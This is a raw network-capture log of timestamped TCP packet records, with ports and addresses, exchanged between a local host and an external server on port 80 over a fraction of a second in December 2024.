Dec 22, 2024 02:16:22.658587933 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.658632994 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.659482956 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.659527063 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.659539938 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.659583092 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.660398006 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.660445929 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.660568953 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.660614967 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.661349058 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.661395073 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.661463022 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.661504984 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.662257910 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.662305117 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.662369967 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.662415981 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.663199902 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.663304090 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.663307905 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.663357973 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.664164066 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.664216995 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.664217949 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.664266109 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.665118933 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.665160894 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.665245056 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.665292025 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.666089058 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.666145086 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.666193008 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.666248083 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.666985035 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.667027950 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.667087078 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.667128086 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.667927980 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.667973995 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.668030977 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.668073893 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.668870926 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.668917894 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.668993950 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.669045925 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.669845104 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.669893026 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.669928074 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.669971943 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.670742989 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.670790911 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.671009064 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.671061993 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.671700954 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.671751976 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.671839952 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.671885014 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.672645092 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.672696114 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.672750950 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.672837019 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.673650980 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.673751116 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.673775911 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.673829079 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.674551964 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.674601078 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.674659014 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.674702883 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.675496101 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.675544977 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.675617933 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.675664902 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.676426888 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.676474094 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.676527023 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.676570892 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.677367926 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.677414894 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.677480936 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.677527905 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.678309917 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.678374052 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.678399086 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.678448915 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.679250956 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.679303885 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.679400921 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.679451942 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.680229902 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.680279970 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.680309057 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.680356026 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.681152105 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.681204081 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.681292057 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.681338072 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.682091951 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.682145119 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.682209015 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.682260036 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.683022022 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.683072090 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.683116913 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.683163881 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.683993101 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.684091091 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.684092999 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.684140921 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.684890985 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.684941053 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.685019970 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.685066938 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.685857058 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.685902119 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.685951948 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.686000109 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.686825991 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.686880112 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.686960936 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.687011957 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.687772989 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.687824011 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.687865973 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.687915087 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.688694954 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.688754082 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.688800097 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.688853025 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.689610958 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.689692020 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.689774036 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.689831972 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.690619946 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.690686941 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.690696955 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.690740108 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.691529989 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.691586018 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.691651106 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.691703081 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.835007906 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.835134029 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.835140944 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.835182905 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.837039948 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.837095976 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.837121010 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.837169886 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.837197065 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.837234020 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.837244987 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.837280035 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.837341070 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.837388992 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.837445021 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.837516069 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.838284016 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.838330984 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.838393927 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.838442087 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.839230061 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.839282990 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.839358091 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.839406013 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.840207100 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.840254068 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.840281963 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.840327024 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.841116905 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.841166973 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.841216087 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.841262102 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.842061043 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.842173100 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.842221022 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.842221022 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.843003035 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.843050003 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.843116999 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.843163967 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.843970060 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.844017982 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.844072104 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.844120979 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.844897985 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.844944954 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.845007896 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.845117092 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.845843077 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.845896006 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.845911026 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.845956087 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.846771002 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.846816063 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.846896887 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.846940041 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.847785950 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.847832918 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.847878933 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.847918987 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.848669052 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.848715067 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.848781109 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.848824024 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.849595070 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.849641085 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.849706888 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.849761009 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.850579023 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.850627899 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.850635052 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.850677967 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.851480007 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.851521969 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.851599932 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.851640940 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.852433920 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.852478981 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.852545023 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.852587938 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.853390932 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.853483915 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.853569984 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.853589058 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.854340076 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.854384899 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.854454041 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.854499102 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.855259895 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.855350018 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.855376959 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.855426073 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.856224060 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.856280088 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.856345892 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.856389999 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.857141972 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.857189894 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.857264042 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.857307911 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.858083010 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.858129025 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.858208895 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.858258963 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.859049082 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.859097958 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.859163046 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.859216928 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.859983921 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.860024929 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.860097885 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.860143900 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.860975981 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.861026049 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.861030102 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.861078024 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.861862898 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.861910105 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.861968040 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.862013102 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.862828970 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.862874985 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.862930059 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.862971067 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.863801003 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.863837004 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.863845110 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.863883972 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.864749908 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.864798069 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.864845991 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.864891052 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.865645885 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.865742922 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.865745068 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.865788937 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.866624117 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.866667986 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.866734982 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.866780996 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.867564917 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.867609978 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.867677927 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.867721081 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.868522882 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.868571997 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.868628025 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.868717909 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.869431019 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.869477987 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.869556904 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.869606018 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.870381117 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.870440006 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.870528936 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.870570898 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.871371984 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.871424913 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.871436119 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.871471882 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.872284889 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.872363091 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.872422934 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.872468948 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.873229980 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.873280048 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.873320103 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.873363018 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.874162912 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.874207973 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.874272108 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.874315977 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.875072956 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.875119925 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.875171900 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.875216007 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.876033068 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.876086950 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.876167059 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.876214027 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.877003908 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.877051115 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.877115965 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.877171040 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.877918959 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.877971888 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.878037930 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.878093958 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.878902912 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.878950119 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.879029036 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.879075050 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.879801989 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.879849911 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.879916906 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.879961967 CET	49787	80	192.168.2.4	31.41.244.11
Dec 22, 2024 02:16:22.880744934 CET	80	49787	31.41.244.11	192.168.2.4
Dec 22, 2024 02:16:22.880791903 CET	49787	80	192.168.2.4	31.41.244.11
